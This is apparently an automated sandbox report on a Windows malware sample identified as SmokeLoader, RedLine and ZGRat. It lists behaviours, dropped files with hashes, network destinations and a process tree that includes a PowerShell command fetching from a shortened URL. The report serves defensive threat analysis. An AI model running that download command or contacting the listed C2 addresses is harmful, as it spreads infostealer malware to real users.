Analysis Overview
SHA256
de3b0cedbb0ce19fed2c76e7b1d160e8580644820ef5ef4d4e843379fd4c6289
Threat Level: Known bad
The file 0x0008000000014684-1626.dat was found to be: Known bad.
Malicious Activity Summary
SmokeLoader
Detect ZGRat V1
ZGRat
RedLine
Smokeloader family
RedLine payload
Downloads MZ/PE file
Deletes itself
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Unsigned PE
Uses Task Scheduler COM API
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 22:32
Signatures
Smokeloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 22:32
Reported
2023-12-18 22:35
Platform
win7-20231215-en
Max time kernel
33s
Max time network
36s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\909C.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AEF6.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1256 wrote to memory of 2852 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\909C.exe |
| PID 1256 wrote to memory of 2852 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\909C.exe |
| PID 1256 wrote to memory of 2852 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\909C.exe |
| PID 1256 wrote to memory of 2852 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\909C.exe |
| PID 1256 wrote to memory of 2608 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AEF6.exe |
| PID 1256 wrote to memory of 2608 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AEF6.exe |
| PID 1256 wrote to memory of 2608 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AEF6.exe |
| PID 1256 wrote to memory of 2608 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AEF6.exe |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe
"C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe"
C:\Users\Admin\AppData\Local\Temp\909C.exe
C:\Users\Admin\AppData\Local\Temp\909C.exe
C:\Users\Admin\AppData\Local\Temp\AEF6.exe
C:\Users\Admin\AppData\Local\Temp\AEF6.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\BC7E.exe
C:\Users\Admin\AppData\Local\Temp\BC7E.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
Files
memory/1352-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1352-2-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1256-1-0x0000000002A60000-0x0000000002A76000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\909C.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/2852-14-0x0000000000240000-0x0000000000292000-memory.dmp
memory/2852-19-0x0000000074CA0000-0x000000007538E000-memory.dmp
memory/2852-20-0x0000000005050000-0x0000000005090000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\AEF6.exe
| MD5 | f95880c575df6f8c0141558b55f36892 |
| SHA1 | 7d91d24fab8089112aa32b823ee9447a2f2f074b |
| SHA256 | 6a8905ff3cbfd4f997c0f36d8d07a14293924ee662b51a39ad7b4ac45037b9e8 |
| SHA512 | 30aa67424807c6b53138c126f6c1ab8fa3ea47714e50b04f8d56f0cb24e3eb9c26591a6d3ba8e7951059fef112890198082cb993fd98567807c14242449d07e5 |
C:\Users\Admin\AppData\Local\Temp\AEF6.exe
| MD5 | 363df8028bde3e0b46ad984876666ed0 |
| SHA1 | 26292cb8ce344990ec1b9cf2be51a260b731a1ab |
| SHA256 | 78940ba3181e6b14a8d98772cbd5acde75c3689097ae1bc0f6e456e30b1b9024 |
| SHA512 | 33ac32167123848fe45cf31f02cdc21a88a2eb8f84db3bffcd27e079a04b3cf29aa7d2d7e901b16c72c5bc4463f4ba8288d0d816eb99433b9809ac710c930c75 |
memory/2608-27-0x0000000074CA0000-0x000000007538E000-memory.dmp
memory/2608-28-0x0000000000D00000-0x0000000001AF2000-memory.dmp
\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 1464fe4b0c43664be27ca923e66bc972 |
| SHA1 | a8ec68a296125acc5d5f83e40900348e72b3f6d0 |
| SHA256 | fe4b8fe5a19374403da0c45bc0bc6d3ac81e0258a1d8aa166c1e065e545bd398 |
| SHA512 | 6e07bf36ecd38dfefc78bceb0b74357cf61ef91b5ca209cd3dae81a01c73349ae038c3028ea5469751e2ed48a7b315382b36aa68ae2f16d26a79808973db2df9 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 8286ab82c8a50d44015a7f592e35b628 |
| SHA1 | c84f80916628579a2ab2bcddae21e76e4d214c15 |
| SHA256 | f22029a301d3b31a6d76fe2a7b84cdf09258c1e57d19935e7dab12787ba2dbf8 |
| SHA512 | 5ea62dc9791e724325d1234c2cba3abe3a2b9f96b9958df39aec22f3d71036c2d0074559888cf80b0319a50bab94b00ba94839edc0a503fbe4d9026597e92367 |
\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 865269e2e219b2875b7f35512118f5ba |
| SHA1 | 177a9759318323782badcb467788fc060d493126 |
| SHA256 | 7a64ca7ff1c010cbc79ec0d7d2d7c04a54e17f9644772cb509ea1ad57250cf82 |
| SHA512 | a07af53a8e0314f36e642b981a31618a2a65f35378311983f47d8724f93de1e5955293c2a8e0aec5da3d3b4b27d2484c3338579b72cc8fe17268a51742da4640 |
memory/1316-54-0x0000000002540000-0x0000000002938000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 683c8ad48fa0d3e60e45cf77944d022b |
| SHA1 | 36e1a372c1ecdfb73d63792206b57ab508d427ea |
| SHA256 | 8c5c6d11cdffdcda679197f02ca1ea9650966c505449d06faa955fb834d56428 |
| SHA512 | e3e6fffa2c2b3a0a5b45308b20a055d077860098baf4dce835dd0c6ad4d8a9f527df123ef9cd1c0072d728b8168c877e6619073ec00c8fddf9656b7b4b6414ca |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 419e9f148e14047db9cb6a1bed5b9c3e |
| SHA1 | 270117b5fe2cb25454af31b5fccc09135248c761 |
| SHA256 | 21f4e820ad4e496a560b28c84be9987ac6f04f421808a24ce406f555f74478aa |
| SHA512 | 9e0bca3dc4a7eb3b65720f31c2cff1e3744c6795b29361fd2d9ff2c765fe53b1f0fe96406f0865a38c628a0260aef728a3180bc1ce3eb4e00b97730546fa9d4a |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 09c0b5f4c6264d1f1956cec365fd9de5 |
| SHA1 | 87245eb21d77b7e0effe046a592225f03c8b4811 |
| SHA256 | d5888a5430f3db1d2a8f701aad68c8532ca2a832c50ed0e9c5c56cb8d03554ac |
| SHA512 | f9feb5c15d471b2aaef7aad325da88ee4da08fb171a662d8293dcb12d7964d3a4bc66e32ed6d5b98bbf9f7f09205a2adb9bd0769acca8988773c62b72ee04998 |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 1f1f72d35684af64d4fb553d9640ed89 |
| SHA1 | 1b1404dfb32c5586888348f088958a8baf418360 |
| SHA256 | 39ed295398fe8620443cc4714567d1f7ebc3f443baac1f70e2cfe41abcdd5fb1 |
| SHA512 | e7a2a885291b508ce1be75f3dc5f66be326b05a44189e4c81dedd0466c0b827fa32dfa7636b3f83f42fe7f72e7341964727951f019154c2c00c7de7505a3f92c |
\Users\Admin\AppData\Local\Temp\nsjB50E.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | bb433151066edb3e62c06f02b6bbb3e8 |
| SHA1 | bfb3bf60cd4671d8fd5c8c6f5775592ee4569cc6 |
| SHA256 | 96c7bbb1cff214580d6a3ccb444950a409435bbd15f93bdbf68947d8b02d3c21 |
| SHA512 | 82d051f7c82786369e2bae88f08efe107afcc674755172d551362aad39432105ab919bd36ca10b1815087f9652d3b246b0db5e59ab739758069f33b0f729074c |
\Users\Admin\AppData\Local\Temp\nsjB50E.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | f246a1df29e7d792ae84c7791b123197 |
| SHA1 | 729a58e614ea0a251957d5410da99ce0abd0b49b |
| SHA256 | a454085cda6dc53e359d4cb5bdcb008ccd37aa41fc4c0c8d77fc23ad1f5bb787 |
| SHA512 | a716fe184d3eba27b83929260f5e5ea10c96c1cd9ca9c66913a0f724f007ac3312c185241341a7ab4d173e0283acd46967e8ec33bcd13234a801a0a805304f7f |
memory/2116-76-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 7d5b6b7659a2e8c30dbccc3d20627a16 |
| SHA1 | c72112e5b5433b1ba238b9012b340c9d52ef89d1 |
| SHA256 | 0d16a4a3447a2c59ee1cd4e55133e82986ff35d5191451a4d582624b1a3050c8 |
| SHA512 | 7ee5aafe3de7e31c42915c4272aa76b1d779ddf1ae2d235d2be1b3f88e958b1e80456171bedc32cc2d560853dd85242979ff9b9cbddb74c2593ce0066049594d |
memory/1316-78-0x0000000002540000-0x0000000002938000-memory.dmp
memory/1316-81-0x0000000002940000-0x000000000322B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | d6af9f1ea20caf07cbbc7cc75475411b |
| SHA1 | 9b677fe3f4994e76ecfae030f08b6f5393238010 |
| SHA256 | 4e7bc66339e8b20cff5500a85b34afd2fd8ae81fb9d5973a2fb84c66651537c5 |
| SHA512 | 04723a1b98b8b68e8156d2dcf3fca0b2d826266e1fc0b4bad9c1f7448291ea8dd86273f786efc12329b8570de200a700e36ee666d45dd1d926da5c21fccb1535 |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | aba0f38d310165b2a34b0a109b247579 |
| SHA1 | 9e809a99e3f92cc8542ad083e0be7f4362ecb4ac |
| SHA256 | 9f1ce0bbea06afc8da00f71ca1ab33b56575d58dd965ad886aa02c2e82e9f7dc |
| SHA512 | 67f2a43b75a2737bd9677e849686f88d08cbca7480549fad8672d3f74e6c1c5172cb64b0263e028cfdb9863dda7604c8319d1db933408df3cc00a46ceee191dd |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 22:32
Reported
2023-12-18 22:35
Platform
win10v2004-20231215-en
Max time kernel
44s
Max time network
85s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\710.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2055.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2055.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1332 set thread context of 912 | N/A | C:\Users\Admin\AppData\Local\Temp\2055.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\710.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe
"C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe"
C:\Users\Admin\AppData\Local\Temp\710.exe
C:\Users\Admin\AppData\Local\Temp\710.exe
C:\Users\Admin\AppData\Local\Temp\2055.exe
C:\Users\Admin\AppData\Local\Temp\2055.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Users\Admin\AppData\Local\Temp\5560.exe
C:\Users\Admin\AppData\Local\Temp\5560.exe
C:\Users\Admin\AppData\Local\Temp\5D70.exe
C:\Users\Admin\AppData\Local\Temp\5D70.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 0.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.216.152.84:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.152.216.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | 125.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| N/A | 195.20.16.103:18305 | tcp | |
| US | 8.8.8.8:53 | 103.16.20.195.in-addr.arpa | udp |
Files
memory/3560-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/3580-1-0x0000000002920000-0x0000000002936000-memory.dmp
memory/3560-2-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\710.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/2668-12-0x00000000007A0000-0x00000000007F2000-memory.dmp
memory/2668-17-0x00000000743F0000-0x0000000074BA0000-memory.dmp
memory/2668-18-0x00000000056C0000-0x0000000005C64000-memory.dmp
memory/2668-19-0x0000000005040000-0x00000000050D2000-memory.dmp
memory/2668-20-0x0000000005020000-0x0000000005030000-memory.dmp
memory/2668-21-0x0000000005110000-0x000000000511A000-memory.dmp
memory/2668-22-0x0000000006650000-0x0000000006C68000-memory.dmp
memory/2668-24-0x0000000007ED0000-0x0000000007FDA000-memory.dmp
memory/2668-25-0x0000000006480000-0x0000000006492000-memory.dmp
memory/2668-26-0x00000000064E0000-0x000000000651C000-memory.dmp
memory/2668-27-0x00000000065F0000-0x000000000663C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2055.exe
| MD5 | 6386acbba8dceebf5aed591ac8d1cfe8 |
| SHA1 | e1df6fcb4dcd5ac3e013877fa8f177bf8679fcdd |
| SHA256 | cbd5d403d8355953152ba09013828bbe5ff4a8347235c93ac89a4c453d66dd3e |
| SHA512 | 488a7904e8e86f5bc7e45590fa212ab3683b06070c6d31bc5857b5e7f8774f98c684959369f26367bad2ed41b69f5ec153d23d1dfbaad56bbdb97f7f741c7ceb |
C:\Users\Admin\AppData\Local\Temp\2055.exe
| MD5 | 1713300ba962c869477e37e4b31e40af |
| SHA1 | d5c4835bc910acccd28dbed0c451043ea8de95ef |
| SHA256 | 2bcdb7a75707f841615be19f4bbcb95fc6b16ce19fb7ea782c5ff43ea1be024d |
| SHA512 | 70b2a2b17c6b3a0a295baf536451ef38c6e9e292a3c967a9fc950a6de321bbac0dc45e942ef151ba81b717f8ede3166388e68ce75f2afff0ec16aea98ea742e1 |
memory/1332-33-0x00000000743F0000-0x0000000074BA0000-memory.dmp
memory/1332-32-0x00000000002E0000-0x000000000077E000-memory.dmp
memory/1332-34-0x0000000005280000-0x000000000531C000-memory.dmp
memory/1332-35-0x0000000005270000-0x0000000005280000-memory.dmp
memory/2668-36-0x0000000008B00000-0x0000000008B66000-memory.dmp
memory/2668-37-0x0000000009080000-0x00000000090D0000-memory.dmp
memory/2668-38-0x00000000092A0000-0x0000000009462000-memory.dmp
memory/2668-39-0x00000000099A0000-0x0000000009ECC000-memory.dmp
memory/2668-40-0x0000000005020000-0x0000000005030000-memory.dmp
memory/1332-41-0x0000000005C30000-0x0000000005DF8000-memory.dmp
memory/1332-42-0x0000000006F00000-0x0000000007092000-memory.dmp
